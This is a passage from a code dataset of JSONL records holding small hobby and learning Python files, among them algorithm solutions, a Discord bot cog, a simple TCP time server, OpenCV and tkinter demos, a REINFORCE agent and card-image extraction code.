dist + cost\n heapq.heappush(q, (dist + cost, neigh))\n\nprint(distance[end])","repo_name":"bhyun/daily-algorithm","sub_path":"2022/2022.02/BOJ1916_최소비용 구하기.py","file_name":"BOJ1916_최소비용 구하기.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22017863604","text":"from builtins import range, dict\n\n__author__ = 'steve'\n\nimport unittest\nimport GibbsSampler as gs\nimport RandomisedMotifSearch as rms\n\n\nclass MyTestCase(unittest.TestCase):\n def test_random(self):\n pdf = [0.1, 0.8, 0.1]\n\n results = dict()\n\n for _ in range(0, 100000):\n i = gs.biased_random_selector(pdf)\n if i in results:\n results[i] += 1\n else:\n results[i] = 1\n\n print(results)\n\n def test_random_most_probable_kmer_for_profile(self):\n\n p = rms.create_profile([\"CAAAA\", \"AGAAC\", \"ATAAA\", \"GAACG\"])\n s = \"ATATA\"\n k = 3\n\n for i in range(0, 100):\n result = gs.random_most_probable_kmer_for_profile(p, s, k)\n print (result)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"stevehaigh/Bioinformatics","sub_path":"Chapter 3/TestGibbsSampler.py","file_name":"TestGibbsSampler.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8847785007","text":"import discord\nfrom discord.ext import commands\nimport random\n\nclass Extra():\n \"\"\"Extra bot commands\"\"\"\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(pass_context=True)\n async def randmsg(self, ctx):\n msgbits1 = [\n \"a noob.\",\"lolin' my life.\",\n \"bored of not using me bro.\",\"a very clever bot.\",\n \"looking for someone to type `:help`.\"]\n msgbits2 = [\n \"some oil for my gears.\",\n \"u to type a command!.\",\"u to help me code.\",\n \"someone brave enough to join here: https://discord.gg/gFuac2r\",\"sb to fix my gears!\"]\n msgbits3 = [\n \"u haven't just got out of the mistletoe\",\"I could love one day\"]\n msgs = [\n \"Im\",\n \"I want\",\n \"I hope\",\n \"I found a new friend!\",\n \"Looks like there is an anxious user!\",\n \"A bird in the sky!\",\n \"Who turned off the lights :(\",\n \"Hate it when no onew uses me\",\n \"Type :help to see all my commands\",\n \"Did u know that the server owner could load new plugins\",\n \"Like being a bot\",\n \"Isn't it amazing that\",\n \"Like my commands?\"]\n randMsg = random.choice(msgs)\n if randMsg == \"Im\":\n randBits = random.choice(msgbits1)\n randMsg = randMsg + \" \" + randBits\n await self.bot.say(randMsg)\n elif randMsg == \"I want\":\n randBits = random.choice(msgbits2)\n randMsg = randMsg + \" \" + randBits\n await self.bot.say(randMsg)\n elif randMsg == \"I hope\":\n randBits = random.choice(msgbits3)\n randMsg = randMsg + \" \" + randBits\n await self.bot.say(randMsg)\n else:\n await self.bot.say(randMsg)\n\n @commands.command(pass_context=True)\n async def conmb(ctx):\n \"\"\"Returns all members connected to a voice channel\"\"\" \n x = ctx.message.server.members\n conmembs = []\n for member in x:\n if member.voice_channel != None:\n conmembs.append(member.name)\n \n if conmembs == []:\n await client.say(\"No members are connected to a voice channel\")\n else:\n await client.say(\"{}\".format(\" \".join(conmembs)))\n @commands.command(pass_context=True)\n async def encode(ctx, *, msg):\n encoded = []\n msg = msg.lower()\n for letter in msg:\n randnum = randint(0, len(msg)-1)\n if letter == \"i\":\n letter = \"1\"\n encoded.append(letter)\n elif letter == \"a\":\n letter = \"@\"\n encoded.append(letter)\n elif letter == \"e\":\n letter = \"3\"\n encoded.append(letter)\n elif letter == \"o\":\n letter = \"0\"\n encoded.append(letter)\n else:\n if msg[randint] == letter:\n letter = letter.upper()\n encoded.append(letter)\n await client.say(\"Encoded message:{}\".format(\" \".join(encoded)))\n \n\ndef setup(bot):\n bot.add_cog(Extra(bot))\n","repo_name":"stavzog/CraftOLeagueBot","sub_path":"optional.py","file_name":"optional.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29932241790","text":"import socket, time, threading\n\ndef server(handler, host, port):\n s = socket.socket()\n s.bind((host, port))\n s.listen(5)\n print('Server up, running, and waiting for call')\n try:\n while True:\n c, a = s.accept()\n threading.Thread(target=handler, args=(c, a)).start()\n finally:\n s.close()\n\ndef time_handler(c, a):\n print(\"Received connection from\", a)\n c.sendall(b\"Hello %s\\r\\n\" % a[0].encode())\n c.sendall(b\"The time is %s\\r\\n\" % time.ctime().encode())\n c.close()\n\ndef slow_time_handler(c, a):\n print(\"Received connection from\", a)\n c.sendall(b\"Hello %s\\r\\n\" % a[0].encode())\n c.sendall(b\"The time is %s\\r\\n\" % time.ctime().encode())\n for i in range(10):\n c.sendall(b\"The count is %d\\r\\n\" % i)\n time.sleep(1)\n c.close()\n\nif __name__ == '__main__':\n\n server(slow_time_handler, '', 9604)\n","repo_name":"vivekdua-tech/pyclass","sub_path":"notes/tcpserver_threading.py","file_name":"tcpserver_threading.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11361912953","text":"#калькулятор расчета капитализации при определенной процентной ставке и кол-во лет (до 15)\r\nmoney = float(input('Введите сумму вклада: '))\r\npercent = float(input('Введите процентную ставку: '))/100+1\r\nstop_year = int(input('Введите длительность вклада в годах: '))\r\nyear = 0\r\ngod1 = [1]\r\ngod2 = [2, 3, 4]\r\ngod3 = list(range(5,16))\r\n\r\nwhile year < stop_year:\r\n money *= percent\r\n year += 1\r\n if year in god1:\r\n god = 'год'\r\n if year in god2:\r\n god = 'года'\r\n if year in god3:\r\n god = 'лет'\r\n print(f'Через {year} {god}, сумма вклада составит {round(money, 2)} руб.')\r\n","repo_name":"michael99o/task_test","sub_path":"tasks3.6.8.py","file_name":"tasks3.6.8.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24161807055","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ndefinitions:\nDescription\n\"\"\"\n\n__author__ = 'Tommaso Terragni, PhD.'\n__date__ = '2019-05-19'\n__copyright__ = 'Copyright 2019, Tommaso Terragni, PhD.'\n\nimport os\nimport sys\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nUSER_HOME = os.path.expanduser(\"~\")\n\nsys.path.insert(0, os.path.dirname(os.path.abspath(ROOT_DIR)))\n","repo_name":"tomterragni/test_complex_datascience_project","sub_path":"definitions.py","file_name":"definitions.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36612135803","text":"import cv2\nimport numpy as np\n\n# turn on camera at port 0\ncap = cv2.VideoCapture(0)\n\nwhile(True):\n # read image from camera\n ret, frame = cap.read()\n\n # convert to hsv\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n # find only green colors\n cutoff = cv2.inRange(hsv, (70, 90, 90), (90, 256, 256))\n # blur image\n blur = cv2.GaussianBlur(cutoff, (11, 11), 0)\n # darken, to remove small areas the blur didn't remove\n darken = cv2.add(blur, np.array([-50.0]))\n\n # find all contours\n contours, h = cv2.findContours(darken, 1, 2)\n\n max_area = -1\n max_box = None\n # loop through contours\n for c in contours:\n # rect is ((x, y), (w, h), rot)\n rect = cv2.minAreaRect(c)\n # gets the four points on the outside of the rectangle\n box = cv2.boxPoints(rect)\n # convert to int\n box = np.int0(box)\n # find area of contour\n area = cv2.contourArea(box)\n # if area is greater than max, set the max area and contour\n if area > max_area:\n max_area = area\n max_box = box\n\n # only draw the contour of the max_area has been set\n if max_area > -1:\n cv2.drawContours(frame, [max_box], 0, (0,255,0), 2)\n\n # draw image to screen\n cv2.imshow('frame', frame)\n\n # if q is pressed, quit\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# close windows\ncap.release()\ncv2.destroyAllWindows()\n\n","repo_name":"macmv/opencv-testing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"35090010070","text":"\"\"\"\r\nCopyright 2019 Pacific Gas and Electric Company\r\n\r\nALL RIGHTS RESERVED\r\n\"\"\"\r\nclass history:\r\n def __init__(self):\r\n self.prevset = ''\r\n\r\n def compare(self, text, kworker=False, filter=None):\r\n self.curset = set(text.splitlines())\r\n if self.prevset == '':\r\n diff = self.curset\r\n else:\r\n diff = self.curset.difference(self.prevset)\r\n self.prevset = self.curset\r\n\r\n if filter is not None:\r\n return [x for x in diff if filter in x]\r\n elif kworker == False:\r\n return [x for x in diff if \"kworker\" not in x and \"[ps]\" not in x]\r\n else:\r\n return [x for x in diff if \"[ps]\" not in x]\r\n\r\n def write_to_file(self, file_name):\r\n with open(file_name, 'w') as f:\r\n f.writelines(self.prevset)\r\n\r\n def read_from_file(self, file_name):\r\n with open(file_name, 'r') as f:\r\n self.prevset = set(f.read().splitlines())\r\n","repo_name":"idaholab/STOTS","sub_path":"CommandLineEngine/conf/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"23599112862","text":"async def add(self, msg):\n try:\n coins = msg.content.split(' ')[1:]\n channel_id = msg.channel.id\n \n coins_info = self.binance_client.get_exchange_info()\n\n valid_coins = {}\n for coin_info in coins_info['symbols']:\n valid_coins[coin_info['symbol']] = True\n\n for coin in coins:\n is_added = False\n coin = coin.upper()\n if valid_coins.get(coin) == True:\n if self.channel_config[channel_id]['funds'].get(coin) is None:\n self.channel_config[channel_id]['funds'][coin] = 0\n is_added = True\n \n\n if not is_added:\n if self.channel_config[channel_id]['funds'].get(coin) is not None:\n await msg.reply('>>> It\\'s already added...')\n else:\n await msg.reply(f\">>> Did not found {msg.content.split(' ')[1]}..\")\n else:\n await msg.reply('>>> '+coin+' is added to the whitelist')\n if self.add_by.get(channel_id) is not None:\n self.add_by.pop(channel_id)\n await msg.reply('>>> addby function is stopped')\n except IndexError:\n if self.debug:\n print('Invalid Command')\n await msg.reply('Invalid Command')\n","repo_name":"h3x4d1v1n3/CrypticIntel","sub_path":"CrypticIntel/bot/on_message/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14987048270","text":"import json\n\n# My repo has next format:\n# ID - number for row,\n# Date (0) - date of transaction,\t\n# Hour (1) - hour of transaction,\t\n# Place (2) - from which place you spend money or in which place you bring your earn. For example it can be wallet, card, safe and etc,\t\n# Envelop(3) - the main idea of app is separate money by virtual envelopes and through this get control by money,\n# Spent or earned(4) - '+' or '-' count for envelop\n# Amount(5) - amount of money which you spent or got on your account\n# Envelop balance(6) - amount of money in the envelope after transaction \n\n#----------------------- reading and storing in json --------------------------------------\ndef read_repo_from_json():\n with open(\"repo.json\", 'r') as f:\n repo = json.load(f)\n return repo\n\ndef store_repo_in_json():\n with open(\"repo.json\", 'w') as f:\n json.dump(repo, f)\n\ndef read_places_from_json():\n with open(\"places.json\", 'r') as f:\n places = json.load(f)\n return places\n\ndef store_places_in_json():\n with open(\"places.json\", 'w') as f:\n json.dump(places, f)\n\ndef read_envelopes_from_json():\n with open(\"envelopes.json\", 'r') as f:\n envelopes = json.load(f)\n return envelopes\n\ndef store_envelopes_in_json():\n with open(\"envelopes.json\", 'w') as f:\n json.dump(envelopes, f)\n\nrepo = read_repo_from_json()\nplaces = read_places_from_json()\nenvelopes = read_envelopes_from_json()\n\n#----------------------- places ------------------------------------------------------------\ndef get_place_balance(name, last_row=None):\n if last_row==0:\n res = f\"No balance for {name}\"\n return res \n if not last_row:\n last_row = str(len(repo)) \n if repo[str(last_row)][2] == name:\n return repo[str(last_row)][6]\n else:\n last_row = int(last_row)-1\n return get_place_balance(name, last_row)\n\ndef add_place_name(name):\n places[len(places)+1]=name\n return places\n\ndef change_place_name(place, k, last_row=None):\n old_place = places[k]\n if last_row==0:\n places[k]=place\n return \n if not last_row:\n last_row = str(len(repo))\n if repo[str(last_row)][2] == old_place:\n repo[str(last_row)][2] = place\n return change_place_name (place, k, int(last_row)-1)\n else:\n return change_place_name (place, k, int(last_row)-1)\n\ndef delete_place_name(k):\n places.pop(k)\n return (places)\n\ndef count_expenses_by_place(name,last_row=None):\n if last_row==0:\n return 0\n if not last_row:\n last_row = str(len(repo))\n if repo[str(last_row)][2]==name and repo[str(last_row)][4]=='-':\n expenses = repo[str(last_row)][5]\n return expenses+count_expenses_by_place(name, int(last_row)-1)\n else:\n return count_expenses_by_place(name, int(last_row)-1) \n\ndef count_income_by_place(name,last_row=None):\n if last_row==0:\n return 0\n if not last_row:\n last_row = str(len(repo))\n if repo[str(last_row)][2]==name and repo[str(last_row)][4]=='+':\n income = repo[str(last_row)][5]\n return income+count_income_by_place(name, int(last_row)-1)\n else:\n return count_income_by_place(name, int(last_row)-1)\n\ndef show_places():\n return places\n\ndef get_places_len():\n res = len(places)\n return res \n\n#----------------------- envelopes ------------------------------------------------------------\ndef count_expenses_by_envelope(name,last_row=None):\n if last_row==0:\n return 0\n if not last_row:\n last_row = str(len(repo))\n if repo[str(last_row)][3]==name and repo[str(last_row)][4]=='-':\n expenses = repo[str(last_row)][5]\n return expenses+count_expenses_by_envelope(name, int(last_row)-1)\n else:\n return count_expenses_by_envelope(name, int(last_row)-1) \n\ndef add_envelopes_limit(k, limit):\n envelopes[k][1]=limit\n return envelopes\n\ndef add_envelope_name(name):\n envelopes[len(envelopes)+1]=[name,'None']\n return envelopes\n\ndef change_envelope_name(envelope, k, last_row=None):\n old_envelope = envelopes[k][0]\n if last_row==0:\n envelopes[k][0]=envelope\n return \n if not last_row:\n last_row = str(len(repo))\n if repo[str(last_row)][3] == old_envelope:\n repo[str(last_row)][3] = envelope\n return change_envelope_name (envelope, k, int(last_row)-1)\n else:\n return change_envelope_name (envelope, k, int(last_row)-1)\n\ndef delete_envelope_name(k):\n envelopes.pop(k)\n return (envelopes)\n\ndef count_income_by_envelope(name,last_row=None):\n if last_row==0:\n return 0\n if not last_row:\n last_row = str(len(repo))\n if repo[str(last_row)][3]==name and repo[str(last_row)][4]=='+':\n income = repo[str(last_row)][5]\n return income+count_income_by_envelope(name, int(last_row)-1)\n else:\n return count_income_by_envelope(name, int(last_row)-1)\n\ndef show_envelopes():\n return envelopes\n\ndef get_envelopes_len():\n res = len(envelopes)\n return res \n\n\n#----------------------- rows ------------------------------------------------------------\ndef add_row(date, hour, place,envelop, spent_or_earned, amount, balance):\n new_row = [date, hour, place, envelop, spent_or_earned, amount, balance]\n repo[str(len(repo)+1)] = new_row\n res = [str(len(repo))]\n res.append(new_row)\n return res\n\ndef get_row(n):\n res = repo[n]\n return res\n\ndef get_repo_len():\n res = len(repo)\n return res ","repo_name":"MikitaTsiarentsyeu/Md-PT1-50-22","sub_path":"Tasks/Bartosh/Task6/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15121645175","text":"\nfrom collections import defaultdict, deque\nimport heapq\nimport re\n\nfrom help import get_input\n\n'''\nPart1\n-----\n1762: too low\n1857: too low, same as other answer\n1915: tool low, same as other answer\n'''\n\nTEST1 = '''Valve AA has flow rate=0; tunnels lead to valves DD, II, BB\nValve BB has flow rate=13; tunnels lead to valves CC, AA\nValve CC has flow rate=2; tunnels lead to valves DD, BB\nValve DD has flow rate=20; tunnels lead to valves CC, AA, EE\nValve EE has flow rate=3; tunnels lead to valves FF, DD\nValve FF has flow rate=0; tunnels lead to valves EE, GG\nValve GG has flow rate=0; tunnels lead to valves FF, HH\nValve HH has flow rate=22; tunnel leads to valve GG\nValve II has flow rate=0; tunnels lead to valves AA, JJ\nValve JJ has flow rate=21; tunnel leads to valve II'''\n\nregex = re.compile('Valve (\\w+) has flow rate=(\\d+); tunnels? leads? to valves? (.*)')\n\nSTART = 'AA'\nTOTAL_TIME_PART_1 = 30\nTOTAL_TIME_PART_2 = 26\n\ndef parse(s):\n M = {}\n P = {}\n for line in s.split('\\n'):\n m = regex.match(line)\n assert m is not None\n valve = m[1]\n rate = int(m[2])\n other_valves = m[3].split(', ')\n M[valve] = other_valves\n P[valve] = rate\n return M, P\n\n\ndef new_map(M, P):\n M1 = defaultdict(list)\n V = [v for v, p in P.items() if p > 0]\n V = [START] + V\n for vstart in V:\n q = [(0, vstart)]\n seen = set()\n\n # print(vstart, q, seen)\n\n while q:\n t, v = heapq.heappop(q)\n\n if v in seen:\n continue\n seen.add(v)\n\n\n if P[v] > 0 and v != vstart:\n M1[vstart].append((v, t))\n\n for nv in M[v]:\n q.append((t + 1, nv))\n\n return M1\n\n\ndef neighbour_state(state, M1, P):\n '''\n Excluded is a previous valve that we don't want to consider again as a neighbour.\n '''\n pressure, valve, minute, opened = state\n if P[valve] > 0 and valve not in opened:\n new_openened = opened.copy()\n new_openened = new_openened | frozenset([valve])\n extra_pressure = (TOTAL_TIME_PART_1 - minute - 1) * P[valve]\n yield pressure + extra_pressure, valve, minute + 1, new_openened\n for neighbour, dt in M1[valve]:\n yield pressure, neighbour, minute + dt, opened\n\n\ndef neighbour_state_2(state, M1, P):\n p, v1, v2, t, o = state\n\n s1 = p, v1, t, o\n for n1 in neighbour_state(s1, M1, P):\n p1a, n1a, t1a, o1a = n1\n\n o2 = o | o1a\n s2 = p1a, v2, t, o2\n for n2 in neighbour_state(s2, M1, P):\n p2a, n2a, t2a, o2a = n2\n\n t_new = max(t1a, t2a)\n new_state = p2a, n1a, n2a, t_new, o2a\n\n yield new_state\n\n\ndef part1(M, P):\n '''\n State: total_pressure, current valve, minute, opened valves\n '''\n start_state = 0, START, 0, frozenset()\n q = [start_state]\n seen = set()\n pressure = 0\n\n while q:\n state = heapq.heappop(q)\n if state[0] > pressure:\n pressure = state[0]\n # print('New max', pressure)\n\n test = state[1], state[2], state[3]\n if test in seen:\n continue\n seen.add(test)\n\n for n_state in neighbour_state(state, M, P):\n if n_state[2] <= TOTAL_TIME_PART_1:\n heapq.heappush(q, n_state)\n\n return pressure\n\n\ndef part2(M, P):\n '''\n State: total_pressure, my valve, elephant valve, minute, opened valves\n '''\n start_state = 0, START, START, 0, frozenset()\n q = [start_state]\n seen = set()\n pressure = 0\n\n i = 0\n\n while q:\n state = heapq.heappop(q)\n\n i += 1\n if i % 100_000 == 0:\n print(state, len(q))\n\n if state[0] > pressure:\n pressure = state[0]\n\n test = state[1], state[2], state[3], state[4]\n if test in seen:\n continue\n seen.add(test)\n\n for n_state in neighbour_state_2(state, M, P):\n if n_state[3] <= TOTAL_TIME_PART_2:\n heapq.heappush(q, n_state)\n\n return pressure\n\n\ndef main():\n # s = get_input('16')\n s = TEST1.strip()\n M, P = parse(s)\n M1 = new_map(M, P)\n\n p1 = part1(M1, P)\n # p2 = part2(M1, P)\n\n print('Part 1:', p1)\n # print('Part 2:', p2)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"PreludeAndFugue/AdventOfCode","sub_path":"2022/python/day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23446861546","text":"# 최대 M원\nimport sys\nfrom heapq import heappush, heappop\n\ninput = lambda : sys.stdin.readline().rstrip()\nINF = float(\"inf\")\n\ntest_size = int(input())\nfor test in range(test_size) :\n N, cost, M = map(int, input().split()) # 공항의 수, 총 지원 비용, 티켓 정보의 수\n dp = [[INF] * N for _ in range(cost+1)] # 열 = 노드 / 행 = 비용\n graph = [[] for _ in range(N)]\n\n for i in range(M) :\n U, V, C, D = map(int, input().split()) # 도착, 출발, 비용, 시간\n graph[U-1].append((V-1, C, D)) # 도착점, 비용, 시간 저장\n heap = [(0, 0, 0)] # 거리, 비용, 노드\n while heap :\n now_dist, now_cost, now_node = heappop(heap)\n if now_dist > dp[now_cost][now_node] :\n continue\n for to_node, to_cost, to_dist in graph[now_node] :\n tmp_dist = now_dist + to_dist\n tmp_cost = now_cost + to_cost\n if tmp_cost <= cost and tmp_dist < dp[tmp_cost][to_node]:\n # 더 높은 cost를 투자할 때의 가중치도 초기화 해주기\n for c in range(tmp_cost, cost+1) :\n if dp[c][to_node] > tmp_dist :\n dp[c][to_node] = tmp_dist\n else:\n break\n heappush(heap, (tmp_dist, tmp_cost, to_node))\n\n print(dp[cost][N-1] if dp[cost][N-1] != INF else \"Poor KCM\")\n\n","repo_name":"JoungMinJu/PyCodingTest","sub_path":"Reis/dijkstra/first/BOJ_10217.py","file_name":"BOJ_10217.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7848584507","text":"from tkinter import *\n\n\nclass PaintBox(Frame):\n\n\n def __init__(self):\n Frame.__init__(self)\n self.pack(expand=YES, fill=BOTH)\n self.master.title(\"Paint with Python\")\n self.master.geometry(\"500x500\")\n\n self.message = Label(self, text=\"Drag the mouse to draw\")\n self.message.pack(side=BOTTOM)\n\n self.myCanvas = Canvas(self)\n self.myCanvas.pack(expand=YES, fill=BOTH)\n\n self.myCanvas.bind(\"\", self.paint)\n\n def paint(self, event):\n x1,y1 = (event.x -2 ), (event.y -2 )\n x2,y2 = (event.x +2 ), (event.y +2 )\n self.myCanvas.create_oval(x1,y1,x2,y2,fill=\"Blue\", outline=\"red\")\n\ndef main():\n PaintBox().mainloop()\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"paladino3/AulasPythnoPOO","sub_path":"DevMediaPythonCompleto65Horas/Aula43.InterFaceGraficaCanvas02.py","file_name":"Aula43.InterFaceGraficaCanvas02.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42875136379","text":"# SUJET 34\n\n# Exo 1 :\ndef moyenne(tab):\n sum = 0\n for element in tab :\n sum += element\n if len(tab) != 0 :\n return sum/len(tab)\n else :\n # Proposer une façon de traiter le cas où le tableau passé en paramètre est vide.\n return 'Votre tableau est vide !'\n\n# Appels de vérification :\nprint(moyenne([5,3,8]))\nprint(moyenne([1,2,3,4,5,6,7,8,9,10]))\nprint(moyenne([]))\n\n# Exo 2 :\ndef tri(tab):\n # i est le premier indice de la zone non triée,\n # j est le dernier indice de cette zone non triée.\n # Au début, la zone non triée est le tableau complet.\n i = 0\n j = len(tab) - 1\n while i != j:\n if tab[i]== 0:\n i = i + 1\n else:\n valeur = tab[j]\n tab[j] = tab[i]\n tab[i] = valeur\n j = j - 1\n return tab\n\n# Appels de vérification :\nprint(tri([0,1,0,1,0,1,0,1,0]))","repo_name":"4strium/Exos-BAC-NSI-2023","sub_path":"SUJET_34/SUJET_34_CORRECTION.py","file_name":"SUJET_34_CORRECTION.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25438817312","text":"import sys, os\nimport argparse\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport gym\nfrom torch.distributions import Categorical\nfrom Network.MLP import MLP\nfrom Memory.Memory import Buffer\nfrom Utils.utils import *\n\n\nclass REINFORCE(nn.Module):\n\n def __init__(self, s_dim, a_dim, device):\n super(REINFORCE, self).__init__()\n\n self.s_dim = s_dim\n self.a_dim = a_dim\n self.policy = MLP(s_dim, a_dim, num_neurons=[256]).to(device)\n self.optimizer = torch.optim.Adam(self.policy.parameters(), lr=3e-4)\n self.softmax = nn.Softmax(dim=-1)\n self.logmax = nn.LogSoftmax(dim=-1)\n self.memory = Buffer()\n self.gamma = 0.99\n self.device = device\n\n\n def get_action(self, state):\n\n state = ToTensor(state).to(self.device)\n prob = self.softmax(self.policy(state))\n action = Categorical(prob).sample()\n\n return action.view(-1).detach().cpu().numpy()\n\n def get_sample(self, s, a, r, ns, done):\n\n s = ToTensor(s)\n a = ToTensor(a, False)\n r = ToTensor(r)\n ns = ToTensor(ns)\n done = ToTensor(done)\n\n self.memory.push(s, a, r, ns, done)\n\n def update(self):\n \n states, actions, rewards, _, _ = self.memory.get_sample()\n\n G = 0.0\n for s, a, r in zip(states[::-1], actions[::-1], rewards[::-1]):\n s, a, r = s.to(self.device), a.to(self.device), r.to(self.device)\n G = r + self.gamma*G\n\n log_prob = self.logmax(self.policy(s)).view(-1)[a.item()]\n Loss = -log_prob*G\n\n self.optimizer.zero_grad()\n Loss.backward()\n self.optimizer.step()\n\n self.memory.reset()\n\n def episodic_update(self):\n\n states, actions, rewards, _, _ = self.memory.get_sample()\n\n G = 0.0\n Reward2Go = []\n for r in rewards[::-1]:\n G = r + self.gamma*G\n Reward2Go.insert(0,G)\n\n Reward2Go = torch.tensor(Reward2Go).float().to(self.device)\n Reward2Go = (Reward2Go - Reward2Go.mean()) / Reward2Go.std()\n states = torch.cat(states, dim=0).to(self.device)\n actions = torch.cat(actions, dim=0).to(self.device)\n\n log_prob = self.logmax(self.policy(states))\n log_prob = log_prob.gather(1, actions).view(-1)\n Loss = -(log_prob * Reward2Go).mean()\n\n self.optimizer.zero_grad()\n Loss.backward()\n self.optimizer.step()\n \n self.memory.reset()\n\n def run_episode(self, env, num_episode):\n\n reward_sum = []\n\n for ep in range(num_episode):\n cum_r = 0\n s = env.reset()[0]\n\n while True:\n a = self.get_action(s)\n ns, r, done, trunc, _ = env.step(a.item())\n new_done = False if (done==False and trunc==False) else True\n\n self.get_sample(s, a, r/100, ns, new_done)\n s = ns\n cum_r += r\n\n if new_done:\n self.episodic_update()\n reward_sum.append(cum_r)\n break\n\n print('ep : {} | reward : {}'.format(ep, cum_r))\n\n if ep % 10 == 0 and ep != 0:\n print('ep : {} | reward_avg : {}'.format(ep, np.mean(reward_sum)))\n reward_sum = []\n\n\n\ndef main():\n\n\n env = gym.make('CartPole-v1')\n s_dim = env.observation_space.shape[0]\n a_dim = env.action_space.n\n\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n print(device)\n\n agent = REINFORCE(s_dim, a_dim, device)\n\n agent.run_episode(env, 1000)\n \n\nif __name__ == \"__main__\":\n main()","repo_name":"yujunyoung1107/Deep-RL","sub_path":"REINFORCE.py","file_name":"REINFORCE.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73809997587","text":"import numpy as np\nfrom card_constants import *\nfrom polynomial_fitters import *\nfrom PIL import Image, ImageFilter, ImageDraw, ImageTransform\n\ndef extract_card(image, draw=False):\n img_array = np.array(image, dtype=np.uint8)\n # Find small box around card\n (left, right) = process_horisontal(img_array, np.array(minor_border_color), 100)\n (top, bottom) = process_vertical(img_array, np.array(minor_border_color), 100)\n\n # Define padding around box\n d_left = 10\n d_top = 10\n d_right = 13\n d_bottom = 15\n\n left_x = [l[0] for l in left]\n rigt_x = [l[0] for l in right]\n top_y = [l[1] for l in top]\n bottom_y = [l[1] for l in bottom] \n\n box = [min(left_x)-d_left, \n min(top_y)-d_top,\n max(rigt_x)+d_right,\n max(bottom_y)+d_bottom]\n \n image_box = image.crop(box)\n\n # Use edge detection on boxed card to find edges\n imgw = image_box.convert(\"L\")\n imgw = imgw.filter(ImageFilter.FIND_EDGES)\n\n # Remove 1 px as this is detected as an edge\n box_1px = [1,1,imgw.size[0]-1, imgw.size[1]-1]\n \n image_box = image_box.crop(box_1px)\n imgw = imgw.crop(box_1px)\n\n img_array = np.array(imgw, dtype=np.uint8) \n \n (left, right) = process_horisontal(img_array, 255, 100)\n (top, bottom) = process_vertical(img_array, 255, 100)\n\n # Edge detection seem to detect 1px before edge on top and left. Shift to correct\n for i in range(len(left)):\n left[i][0] = left[i][0] + 1\n\n for i in range(len(top)):\n top[i][1] = top[i][1] + 1\n\n if draw:\n img_test = imgw.convert('RGB')\n\n img1 = ImageDraw.Draw(img_test)\n\n def draw_points(points):\n w = 1\n for p in points:\n img1.ellipse((round(p[0])-w, round(p[1])-w,round(p[0])+w,round(p[1])+w), fill='green')\n\n draw_points(left)\n draw_points(right)\n draw_points(top)\n draw_points(bottom)\n\n # Find polynomial that fits the points\n # For left and right we need to swap the points to get a well behaved function\n c_left = fit_polynomial_outliers_iterative(swap_points(left))\n c_right = fit_polynomial_outliers_iterative(swap_points(right))\n c_top = fit_polynomial_outliers_iterative(top)\n c_bottom = fit_polynomial_outliers_iterative(bottom)\n\n p_left = np.poly1d(c_left)\n p_right = np.poly1d(c_right)\n p_top = np.poly1d(c_top)\n p_bottom = np.poly1d(c_bottom)\n\n # Find two points for each line\n xp = [0, imgw.size[0]]\n yp = [0, imgw.size[1]]\n\n top = [np.array([x,p_top(x)]) for x in xp]\n bottom = [np.array([x,p_bottom(x)]) for x in xp]\n\n left = [np.array([p_left(y), y]) for y in yp]\n right = [np.array([p_right(y),y]) for y in yp]\n\n if draw:\n img1.line([left[0][0], left[0][1],left[1][0], left[1][1]], fill=\"red\", width=0)\n img1.line([right[0][0], right[0][1],right[1][0], right[1][1]], fill=\"red\", width=0)\n img1.line([top[0][0], top[0][1],top[1][0], top[1][1]], fill=\"red\", width=0)\n img1.line([bottom[0][0], bottom[0][1],bottom[1][0], bottom[1][1]], fill=\"red\", width=0)\n return img_test\n\n # Use points to find corners of the card\n top_left = find_cross(left[0], left[1], top[0],top[1])\n top_right = find_cross(right[0], right[1], top[1],top[0])\n bottom_left = 